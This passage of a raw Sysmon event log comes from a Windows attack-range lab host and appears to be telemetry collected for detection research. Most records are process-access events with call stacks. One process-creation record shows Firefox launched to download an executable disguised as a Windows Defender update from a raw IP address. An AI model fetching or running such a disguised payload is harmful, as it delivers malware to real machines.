32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047994Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.983{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047993Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.983{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047992Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.983{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047991Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.983{FE4C2B44-DDF4-63C7-A004-00000000AF02}47004228C:\Windows\system32\csrss.exe{FE4C2B44-E66C-63C7-9E06-00000000AF02}5664C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000047990Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.983{FE4C2B44-E66B-63C7-9B06-00000000AF02}33045480C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66C-63C7-9E06-00000000AF02}5664C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+6e193|C:\Windows\System32\ADVAPI32.dll+188af|C:\Program Files\Mozilla Firefox\firefox.exe+ac12|C:\Program Files\Mozilla Firefox\firefox.exe+6673|C:\Program Files\Mozilla Firefox\xul.dll+7a8fbe|C:\Program Files\Mozilla Firefox\xul.dll+9e365b|C:\Program Files\Mozilla Firefox\xul.dll+9e1625|C:\Program Files\Mozilla Firefox\xul.dll+9e934e|C:\Program Files\Mozilla Firefox\xul.dll+82fb43|C:\Program Files\Mozilla Firefox\xul.dll+17e59b8|C:\Program Files\Mozilla Firefox\xul.dll+17d1c3b|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+1f57e|C:\Program Files\Mozilla Firefox\xul.dll+833d37|C:\Program Files\Mozilla Firefox\nss3.dll+7318c|C:\Program Files\Mozilla Firefox\nss3.dll+885b1|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000047989Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.987{FE4C2B44-E66C-63C7-9E06-00000000AF02}5664C:\Program Files\Mozilla Firefox\firefox.exe109.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3304.2.1828509216\1695167945" -childID 1 -isForBrowser -prefsHandle 2924 -prefMapHandle 2920 -prefsLen 26862 -prefMapSize 234522 -jsInitHandle 888 -jsInitLen 246772 -a11yResourceId 64 -parentBuildID 20230112150232 -appDir "C:\Program Files\Mozilla Firefox\browser" - {82eb0b08-92ae-4c4b-b02c-125a1e2ade23} 3304 "\\.\pipe\gecko-crash-server-pipe.3304" 2936 19fb61aee58 tabC:\Windows\system32\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2LowMD5=66A6B001D806D3117BBA41DD55C08DE0,SHA256=0FC5FD25E5CB032AF0E867B74AD8FCB3A0F5803F3C661E398D5A03448C5CA946,IMPHASH=B9CD654B3D499FE4AD9B5E6D464FD125{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url http://45.139.105.143/d/rsWinDefendUpdateCheck.exe 10341000x800000000000000047988Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.983{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E66C-63C7-9E06-00000000AF02}5664C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047987Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.983{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047986Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.983{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047985Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.983{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047984Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.983{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047983Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.983{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047982Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.983{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047981Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.983{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047980Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.983{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047979Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.983{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047978Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.983{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047977Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.983{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047976Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.983{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047975Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.983{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047974Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.983{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047973Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.983{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047972Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.983{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000047971Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.983{FE4C2B44-D9F3-63C7-0B00-00000000AF02}6242204C:\Windows\system32\lsass.exe{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla 